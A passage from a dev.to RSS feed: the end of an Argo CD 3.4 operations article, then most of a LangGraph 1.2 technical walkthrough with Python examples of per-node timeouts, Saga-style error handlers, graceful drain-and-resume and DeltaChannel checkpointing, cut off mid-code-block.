&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;Add cluster pause annotation to the incident runbook&lt;/td&gt;
&lt;td&gt;SRE&lt;/td&gt;
&lt;td&gt;Pause/resume/diff procedure validated in a mock incident&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;4&lt;/td&gt;
&lt;td&gt;Reorganize per-env values into glob rules (prefix ordering)&lt;/td&gt;
&lt;td&gt;Domain owners&lt;/td&gt;
&lt;td&gt;Deterministic merge order (snapshot test)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;5&lt;/td&gt;
&lt;td&gt;Assign per-env bot identity for Source Hydrator commit author (authorName/Email)&lt;/td&gt;
&lt;td&gt;Platform&lt;/td&gt;
&lt;td&gt;Identity visible in hydrated-branch blame&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;6&lt;/td&gt;
&lt;td&gt;Move external dashboards from polling to AppSet Health field + Watch API&lt;/td&gt;
&lt;td&gt;Observability&lt;/td&gt;
&lt;td&gt;Lower dashboard latency, fewer API calls&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;7&lt;/td&gt;
&lt;td&gt;Add appProject context to notification templates, migrate MS Teams path&lt;/td&gt;
&lt;td&gt;SRE&lt;/td&gt;
&lt;td&gt;Per-project routing + Teams delivery working&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;8&lt;/td&gt;
&lt;td&gt;Measure gRPC DNS TXT-off effect (latency p99) on dual-stack clusters&lt;/td&gt;
&lt;td&gt;Network&lt;/td&gt;
&lt;td&gt;Controller reconcile latency stabilized&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h2&gt;
  
  
  9. Conclusion — "The Next GitOps Challenge Isn't Deployment, It's Operations"
&lt;/h2&gt;

&lt;p&gt;In one line, Argo CD 3.4 is a &lt;strong&gt;declaration that deployment automation is already a solved problem, and what remains is the Day-2 work of safely pausing, tracking, and routing that automation in the middle of an incident.&lt;/strong&gt; Per-cluster pause aligns the unit of incident response with reality (the cluster); Helm valueFiles globs collapse the environment explosion into one line; the Source Hydrator's commit authorship returns audit trails to the rendered-manifests pattern. ApplicationSet's Health/Watch/listResourceEvents elevate the real unit of large-scale GitOps to a first-class object, and the gRPC DNS TXT default opt-out quietly removes invisible latency on dual-stack environments.&lt;/p&gt;

&lt;p&gt;Three closing recommendations. (1) &lt;strong&gt;Before upgrading, check the Helm 3.19 impact and the MS Teams O365 Connector deprecation first&lt;/strong&gt; — neither tolerates "later." (2) &lt;strong&gt;Put cluster pause into your runbook first&lt;/strong&gt; — it's the change that raises incident-response capability the most for the least code. (3) &lt;strong&gt;If you use the Source Hydrator, set the commit author first&lt;/strong&gt; — auto-commits without an audit trail are a powder keg for operational incidents. The shortest one-line recommendation: &lt;em&gt;"This sprint, bump staging to 3.4 and run the cluster-pause → diff → selective-sync procedure once in a mock incident."&lt;/em&gt;&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Originally published at &lt;a href="https://www.manoit.co.kr/forum/view/1482680" rel="noopener noreferrer"&gt;ManoIT Tech Blog&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>kubernetes</category>
      <category>devops</category>
      <category>gitops</category>
      <category>cicd</category>
    </item>
    <item>
      <title>LangGraph 1.2 Deep Dive — Per-Node Timeouts, Error Handlers, Graceful Shutdown, DeltaChannel &amp; Streaming v3</title>
      <dc:creator>daniel jeong</dc:creator>
      <pubDate>Mon, 01 Jun 2026 01:58:10 +0000</pubDate>
      <link>https://dev.to/x4nent/langgraph-12-deep-dive-per-node-timeouts-error-handlers-graceful-shutdown-deltachannel--2mp2</link>
      <guid>https://dev.to/x4nent/langgraph-12-deep-dive-per-node-timeouts-error-handlers-graceful-shutdown-deltachannel--2mp2</guid>
      <description>&lt;p&gt;When you move an AI agent from demo to production, the first thing to break is almost always the &lt;strong&gt;long-running&lt;/strong&gt; path. An LLM call hangs at 30 seconds, an external tool stalls forever, or a rolling deploy SIGKILLs an in-flight agent — and that single failure wipes out tens of minutes of accumulated state. &lt;strong&gt;LangGraph 1.2.0&lt;/strong&gt; (released May 12, 2026) takes direct aim at exactly this. The official changelog summarizes it as "finer-grained control over node execution (timeouts, error recovery, and graceful shutdown), a new channel type that cuts checkpoint overhead for long-running threads, and a content-block-centric streaming API (v3)." The underlying idea is consistent: &lt;strong&gt;treat an agent run as a durable graph execution, not a Python function call.&lt;/strong&gt; This post breaks down the five new capabilities from an operations and architecture angle, and lays out how ManoIT rolled them into its internal agent pipeline.&lt;/p&gt;

&lt;h2&gt;
  
  
  1. Why 1.2 — 1.0's durability, 1.1's type safety, 1.2's node control
&lt;/h2&gt;

&lt;p&gt;Context first. &lt;strong&gt;LangGraph 1.0&lt;/strong&gt; went GA in October 2025 with a promise of no breaking changes until 2.0, establishing durable state, checkpointer-based resumption, and first-class human-in-the-loop. &lt;strong&gt;1.1&lt;/strong&gt; (2026-03-10) added type-safe streaming/invoke and Pydantic/dataclass coercion behind an opt-in &lt;code&gt;version="v2"&lt;/code&gt;. And &lt;strong&gt;1.2&lt;/strong&gt; pushes fault-tolerance controls that previously existed only at the &lt;em&gt;whole-graph&lt;/em&gt; level down to the &lt;strong&gt;individual node&lt;/strong&gt; level.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Version&lt;/th&gt;
&lt;th&gt;Released&lt;/th&gt;
&lt;th&gt;Theme&lt;/th&gt;
&lt;th&gt;Key API&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;1.0.0&lt;/td&gt;
&lt;td&gt;2025-10-20&lt;/td&gt;
&lt;td&gt;Durable execution GA (persistence, resume, HITL)&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;checkpointer&lt;/code&gt;, &lt;code&gt;interrupt&lt;/code&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;1.1.0&lt;/td&gt;
&lt;td&gt;2026-03-10&lt;/td&gt;
&lt;td&gt;Type-safe streaming/invoke&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;version="v2"&lt;/code&gt;, &lt;code&gt;GraphOutput&lt;/code&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;1.2.0&lt;/td&gt;
&lt;td&gt;2026-05-12&lt;/td&gt;
&lt;td&gt;Node-level fault tolerance + streaming v3&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;timeout=&lt;/code&gt;, &lt;code&gt;error_handler=&lt;/code&gt;, &lt;code&gt;DeltaChannel&lt;/code&gt;, &lt;code&gt;version="v3"&lt;/code&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;One caveat up front: the new &lt;strong&gt;timeouts and error handlers are Python-only&lt;/strong&gt;, and timeouts work on &lt;strong&gt;async nodes only&lt;/strong&gt;. Retry policies, however, continue to work in both Python and TypeScript.&lt;/p&gt;

&lt;h2&gt;
  
  
  2. Per-node timeouts — the decisive difference between run_timeout and idle_timeout
&lt;/h2&gt;

&lt;p&gt;Previously there was no standard way to stop a single node from hanging forever. 1.2 adds &lt;code&gt;add_node(..., timeout=)&lt;/code&gt; to cap how long a single attempt may run. The key is that it &lt;strong&gt;separates two kinds of limits&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;&lt;code&gt;run_timeout&lt;/code&gt;&lt;/strong&gt; — a hard wall-clock limit. "This attempt must finish within N seconds," regardless of progress.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;code&gt;idle_timeout&lt;/code&gt;&lt;/strong&gt; — an idle limit that &lt;em&gt;resets on progress&lt;/em&gt;. It keeps a streaming LLM call (whose tokens keep flowing) alive while catching only a genuine stall.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;You can supply both via &lt;code&gt;TimeoutPolicy&lt;/code&gt;. When a limit fires, LangGraph raises &lt;code&gt;NodeTimeoutError&lt;/code&gt;, &lt;strong&gt;clears the writes from that attempt&lt;/strong&gt;, and hands off to the retry policy — so a timeout never leaves partial state behind.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="n"&gt;langgraph.graph&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;StateGraph&lt;/span&gt;
&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="n"&gt;langgraph.types&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;TimeoutPolicy&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;RetryPolicy&lt;/span&gt;

&lt;span class="c1"&gt;# NOTE: timeouts are async-node-only + Python-only
&lt;/span&gt;&lt;span class="k"&gt;async&lt;/span&gt; &lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;call_model&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;state&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;AgentState&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;-&amp;gt;&lt;/span&gt; &lt;span class="nb"&gt;dict&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="c1"&gt;# Streaming LLM call — idle_timeout resets while tokens flow
&lt;/span&gt;    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;messages&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="k"&gt;await&lt;/span&gt; &lt;span class="n"&gt;llm&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;ainvoke&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;state&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;messages&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;])]}&lt;/span&gt;

&lt;span class="n"&gt;builder&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nc"&gt;StateGraph&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;AgentState&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="n"&gt;builder&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;add_node&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
    &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;call_model&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="n"&gt;call_model&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="c1"&gt;# Hard 90s cap, but abort if 15s pass with no progress
&lt;/span&gt;    &lt;span class="n"&gt;timeout&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nc"&gt;TimeoutPolicy&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;run_timeout&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mf"&gt;90.0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;idle_timeout&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mf"&gt;15.0&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
    &lt;span class="n"&gt;retry_policy&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nc"&gt;RetryPolicy&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;max_attempts&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;3&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;  &lt;span class="c1"&gt;# timeout -&amp;gt; handed to retry
&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Operational guidance: put a &lt;code&gt;run_timeout&lt;/code&gt; on external API/tool nodes to eliminate infinite waits, and use &lt;code&gt;idle_timeout&lt;/code&gt; on streaming LLM nodes to catch stalls without killing legitimately long responses. Supplying both is the safest default.&lt;/p&gt;
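
&lt;p&gt;The &lt;code&gt;run_timeout&lt;/code&gt; / &lt;code&gt;idle_timeout&lt;/code&gt; distinction can be made concrete with a minimal plain-asyncio sketch (Python 3.11+ for &lt;code&gt;asyncio.timeout&lt;/code&gt;). It is not LangGraph's implementation and calls no LangGraph API. &lt;code&gt;ToyNodeTimeout&lt;/code&gt; and &lt;code&gt;consume_with_limits&lt;/code&gt; are hypothetical names that stand in for &lt;code&gt;NodeTimeoutError&lt;/code&gt; and for a node consuming a token stream. The idle clock restarts on every chunk; the run clock never restarts.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;import asyncio


class ToyNodeTimeout(Exception):
    """Hypothetical stand-in for NodeTimeoutError; records which limit fired."""

    def __init__(self, kind):
        super().__init__(kind)
        self.kind = kind


async def consume_with_limits(stream, run_timeout, idle_timeout):
    """Collect chunks from an async iterator under a hard cap and an idle cap."""
    chunks = []
    it = aiter(stream)
    try:
        # run_timeout: wall-clock cap on the whole attempt, regardless of progress
        async with asyncio.timeout(run_timeout):
            while True:
                try:
                    # idle_timeout: a fresh clock per chunk, so every chunk resets it
                    chunk = await asyncio.wait_for(anext(it), idle_timeout)
                except StopAsyncIteration:
                    return chunks
                except TimeoutError:
                    raise ToyNodeTimeout("idle_timeout") from None
                chunks.append(chunk)
    except TimeoutError:
        # Only the outer asyncio.timeout can produce a TimeoutError here
        raise ToyNodeTimeout("run_timeout") from None
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;Consider a stream that emits a chunk every few milliseconds. It survives any &lt;code&gt;idle_timeout&lt;/code&gt; longer than that gap, but &lt;code&gt;run_timeout&lt;/code&gt; still cuts it off. A stream that goes silent is caught by &lt;code&gt;idle_timeout&lt;/code&gt; long before the hard cap is reached.&lt;/p&gt;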

&lt;h2&gt;
  
  
  3. Node-level error handlers — first-class Saga / compensation
&lt;/h2&gt;

&lt;p&gt;When a node still fails after retries are exhausted, the whole graph used to blow up with an exception. 1.2 adds &lt;code&gt;add_node(..., error_handler=)&lt;/code&gt; — a &lt;strong&gt;recovery function that runs after all retries are exhausted&lt;/strong&gt;. The handler receives a typed &lt;code&gt;NodeError&lt;/code&gt; and can return a &lt;code&gt;Command&lt;/code&gt; to &lt;strong&gt;update state and route to a different node&lt;/strong&gt;. This expresses &lt;strong&gt;Saga / compensating transactions&lt;/strong&gt; — the "if one of several steps fails, roll back the earlier ones" pattern — declaratively inside the graph.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="n"&gt;langgraph.types&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;Command&lt;/span&gt;
&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="n"&gt;langgraph.errors&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;NodeError&lt;/span&gt;

&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;on_payment_failed&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;state&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;OrderState&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;error&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;NodeError&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;-&amp;gt;&lt;/span&gt; &lt;span class="n"&gt;Command&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="c1"&gt;# All retries failed -&amp;gt; compensate: release the reservation, route to rollback
&lt;/span&gt;    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nc"&gt;Command&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
        &lt;span class="n"&gt;update&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;status&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;payment_failed&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;error&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nf"&gt;str&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;error&lt;/span&gt;&lt;span class="p"&gt;)},&lt;/span&gt;
        &lt;span class="n"&gt;goto&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;release_inventory&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;   &lt;span class="c1"&gt;# compensation node that rolls back the prior step
&lt;/span&gt;    &lt;span class="p"&gt;)&lt;/span&gt;

&lt;span class="n"&gt;builder&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;add_node&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
    &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;charge_payment&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="n"&gt;charge_payment&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="n"&gt;retry_policy&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nc"&gt;RetryPolicy&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;max_attempts&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;3&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
    &lt;span class="n"&gt;error_handler&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;on_payment_failed&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;  &lt;span class="c1"&gt;# called only after 3 failed attempts
&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The point is that post-failure handling no longer lives in try/except blocks scattered across node bodies. The compensation flow becomes part of the graph topology, so failure paths show up in visualization, replay, and checkpoint analysis.&lt;/p&gt;
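
&lt;p&gt;The Saga shape itself does not depend on LangGraph. The plain-Python sketch below uses hypothetical names throughout and makes no LangGraph calls. It shows the control flow the &lt;code&gt;error_handler&lt;/code&gt; example encodes. Each step is retried up to &lt;code&gt;max_attempts&lt;/code&gt; times. Only once every attempt has failed does the code record the error and run the compensations of the already-completed steps, in reverse order.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;class StepFailed(Exception):
    """Hypothetical error a step raises when it fails."""


def run_with_retries(action, state, max_attempts):
    """Call action(state) up to max_attempts times; re-raise the last failure."""
    last_error = None
    for _ in range(max_attempts):
        try:
            return action(state)
        except StepFailed as exc:
            last_error = exc
    raise last_error


def run_saga(steps, state, max_attempts=3):
    """steps: (name, action, compensate) triples; each returns a dict of state updates."""
    completed = []
    for name, action, compensate in steps:
        try:
            state.update(run_with_retries(action, state, max_attempts))
        except StepFailed as exc:
            # Plays the role of error_handler: runs only after every attempt failed
            state.update({"status": name + "_failed", "error": str(exc)})
            for undo in reversed(completed):  # compensate in reverse order
                state.update(undo(state))
            return state
        completed.append(compensate)
    state["status"] = "completed"
    return state
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;In the graph version, the &lt;code&gt;except&lt;/code&gt; branch corresponds to the error handler returning a &lt;code&gt;Command&lt;/code&gt;. Each compensation would be its own node (such as &lt;code&gt;release_inventory&lt;/code&gt;), which keeps the rollback path visible in the topology.&lt;/p&gt;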

&lt;h2&gt;
  
  
  4. Graceful shutdown — deploy without losing state
&lt;/h2&gt;

&lt;p&gt;Killing an in-flight agent with SIGKILL during a rolling deploy or scale-down evaporates work in progress. 1.2's &lt;strong&gt;graceful shutdown&lt;/strong&gt; stops the run cooperatively &lt;strong&gt;right after the current superstep completes&lt;/strong&gt; and &lt;strong&gt;saves a resumable checkpoint&lt;/strong&gt;. Create a &lt;code&gt;RunControl&lt;/code&gt; and call &lt;code&gt;request_drain()&lt;/code&gt; from any thread; the run raises &lt;code&gt;GraphDrained&lt;/code&gt; and can be resumed later from exactly that point with the same config.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="n"&gt;langgraph.runtime&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;RunControl&lt;/span&gt;

&lt;span class="n"&gt;run_control&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nc"&gt;RunControl&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;

&lt;span class="c1"&gt;# e.g. in a SIGTERM handler — drain safely when the deploy signal arrives
&lt;/span&gt;&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;handle_sigterm&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;signum&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;frame&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
    &lt;span class="n"&gt;run_control&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;request_drain&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;  &lt;span class="c1"&gt;# callable from any thread
&lt;/span&gt;
&lt;span class="n"&gt;config&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;configurable&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;thread_id&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;order-42&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;},&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;run_control&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;run_control&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="k"&gt;try&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="n"&gt;result&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;await&lt;/span&gt; &lt;span class="n"&gt;graph&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;ainvoke&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;inputs&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;config&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;config&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="k"&gt;except&lt;/span&gt; &lt;span class="n"&gt;GraphDrained&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="c1"&gt;# checkpoint already saved -&amp;gt; resume with the same config on the next pod
&lt;/span&gt;    &lt;span class="n"&gt;log&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;info&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;drained; will resume from last checkpoint on next pod&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This breaks the "deploy = work loss" equation. A new pod resuming with the same &lt;code&gt;thread_id&lt;/code&gt; picks up right after the superstep where the drain happened.&lt;/p&gt;
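
&lt;p&gt;The cooperative-drain contract can be modeled in a few lines. This is a sketch under stated assumptions, not LangGraph's runtime. &lt;code&gt;ToyRunControl&lt;/code&gt;, &lt;code&gt;ToyDrained&lt;/code&gt;, and &lt;code&gt;run_supersteps&lt;/code&gt; are hypothetical, a dict stands in for the checkpointer, and each "superstep" is a zero-argument callable. The drain flag is checked only after a superstep has finished and its checkpoint has been written, so no completed work is lost.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;import threading


class ToyDrained(Exception):
    """Hypothetical stand-in for GraphDrained."""


class ToyRunControl:
    """Hypothetical stand-in for RunControl: a thread-safe drain flag."""

    def __init__(self):
        self._drain = threading.Event()

    def request_drain(self):
        # Event.set() is thread-safe, so another thread can request the drain
        self._drain.set()

    def draining(self):
        return self._drain.is_set()


def run_supersteps(steps, checkpoints, thread_id, control):
    """Run steps in order, checkpointing after each; stop cooperatively on drain."""
    # Resume from this thread's last checkpoint, or start fresh
    saved = checkpoints.get(thread_id, {"next": 0, "log": []})
    state = {"next": saved["next"], "log": list(saved["log"])}
    for index in range(state["next"], len(steps)):
        state["log"].append(steps[index]())  # the superstep always runs to completion
        state["next"] = index + 1
        # Persist a copy so later mutation cannot alter the saved checkpoint
        checkpoints[thread_id] = {"next": state["next"], "log": list(state["log"])}
        if control.draining():
            raise ToyDrained(thread_id)
    return state["log"]
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;Call &lt;code&gt;run_supersteps&lt;/code&gt; again with the same thread id and a fresh control object. It skips the completed steps and continues from the saved &lt;code&gt;next&lt;/code&gt; index, mirroring a new pod that resumes with the same &lt;code&gt;thread_id&lt;/code&gt;.&lt;/p&gt;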

&lt;h2&gt;
  
  
  5. DeltaChannel — cut long-thread checkpoint cost to increments
&lt;/h2&gt;

&lt;p&gt;A normal channel &lt;strong&gt;re-serializes the full accumulated value&lt;/strong&gt; on every step. For channels that grow over time — like a message list — checkpoint write cost balloons in proportion to thread length. &lt;strong&gt;&lt;code&gt;DeltaChannel&lt;/code&gt; (beta)&lt;/strong&gt; stores &lt;strong&gt;only the incremental delta&lt;/strong&gt; per step to cut that overhead. Since pure deltas would make reads expensive to reconstruct, &lt;code&gt;snapshot_frequency=K&lt;/code&gt; writes a &lt;strong&gt;full snapshot every K steps&lt;/strong&gt; to keep read latency bounded.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="n"&gt;typing&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;Annotated&lt;/span&gt;
&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="n"&gt;langgraph.channels&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;DeltaChannel&lt;/span&gt;
&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="n"&gt;langgraph.graph.message&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;add_messages&lt;/span&gt;

&lt;span class="k"&gt;class&lt;/span&gt; &lt;span class="nc"&gt;AgentState&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;TypedDict&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
    &lt;span class="c1"&gt;# DeltaChannel on a long-growing message channel
